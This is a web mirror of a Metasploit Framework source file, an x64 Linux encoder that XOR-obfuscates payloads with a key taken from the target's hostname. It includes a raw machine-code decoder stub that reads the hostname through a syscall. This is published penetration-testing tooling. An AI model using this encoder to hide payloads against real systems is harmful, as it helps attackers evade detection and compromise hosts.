Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/encoders/x64/xor_context.rb
19515 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Encoder::Xor
7
8
def initialize
9
super(
10
'Name' => 'Hostname-based Context Keyed Payload Encoder',
11
'Description' => 'Context-Keyed Payload Encoder based on hostname and x64 XOR encoder.',
12
'Author' => [
13
'sf',
14
'oso'
15
],
16
'Arch' => ARCH_X64,
17
'License' => MSF_LICENSE,
18
'Platform' => 'linux',
19
'Decoder' => {
20
'KeySize' => 8,
21
'KeyPack' => 'Q',
22
'BlockSize' => 8
23
}
24
)
25
26
register_options([ OptString.new('C_HOSTNAME', [ true, 'Context Hostname.', 'hostname'])])
27
end
28
29
def obtain_key(_buf, _badchars, state)
30
# TODO: Currently only first 8 chars are taken as key. We should include the other chars in the key.
31
state.key = datastore['C_HOSTNAME'][0..8].reverse!.unpack('H*')[0].to_i(16)
32
end
33
34
def decoder_stub(state)
35
# calculate the (negative) block count . We should check this against state.badchars.
36
block_count = [-(((state.buf.length - 1) / state.decoder_key_size) + 1)].pack('V')
37
38
decoder = '' +
39
# get hostname
40
"\x6a\x3f\x58" + # push 0x3f; pop rax
41
"\x48\x8D\x3C\x24" + # lea rdi, [rsp]
42
"\x0F\x05" + # syscall ; LINUX - sys_uname
43
"\x48\x8B\x5F\x41" + # movq rbx, [rdi+0x41]; hostname
44
45
# loop
46
"\x48\x31\xC9" + # xor rcx, rcx
47
"\x48\x81\xE9" + block_count + # sub ecx, block_count
48
"\x48\x8D\x05\xEF\xFF\xFF\xFF" + # lea rax, [rip - 0x01]
49
"\x48\x31\x58\x1d" + # xor [rax+0x1d], rbx
50
"\x48\x2D\xF8\xFF\xFF\xFF" + # sub rax, -8
51
"\xE2\xF4" # loop 0x1B
52
return decoder
53
end
54
end
55
56